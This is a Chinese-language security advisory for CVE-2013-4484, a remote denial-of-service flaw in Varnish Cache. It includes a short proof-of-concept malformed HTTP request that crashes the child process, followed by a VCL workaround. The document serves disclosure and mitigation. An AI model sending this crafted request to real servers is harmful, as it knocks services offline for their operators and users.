Varnish Cache远程拒绝服务漏洞(CVE-2013-4484)

Varnish Cache远程拒绝服务漏洞(CVE-2013-4484)

发布日期：2013-10-29
更新日期：2013-11-02

受影响系统：
varnish-cache Varnish Cache 4.x
varnish-cache Varnish Cache 3.0.5
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63451
CVE(CAN) ID: CVE-2013-4484

Varnish Cache是Web应用加速器。

Varnish Cache 3.0.4及其他版本使用子进程'vcl_error{}'处理畸形请求，在实现上存在断言崩溃漏洞，攻击者可利用此漏洞使应用崩溃，导致拒绝服务。

<*来源：Poul-Henning Kamp
 
  链接：http://www.securityfocus.com/archive/1/529531
        http://seclists.org/bugtraq/2013/Oct/160
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

假设VCL的作用是：

    sub vcl_error {
        return(restart);
    }

发送畸形 HTTP 请求：

    GET<SP><SP><SP><CR><NL>
    Host:<SP>foo<CR><NL>
    <CR><NL>
   
Varnish将断言并重启子进程。

建议：
--------------------------------------------------------------------------------
临时解决方法：

在VCL文件开始插入：
   
    sub vcl_error {
        if (obj.status == 400 || obj.status == 413) {
            return(deliver);
        }
    }
   
或者在现有vcl_error{}开始添加此测试。

厂商补丁：

varnish-cache
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://www.varnish-cache.org/

Varnish Cache 的架构笔记

CentOS 5.8下Varnish-2.1.5的安装配置

RedHat脚本改用CentOS源更新安装Nginx、PHP 5.3、Varnish

利用Varnish构建Cache服务器笔记

缓存服务Varnish安装配置

Varnish 编译安装所需准备

Linux下Varnish缓存的配置优化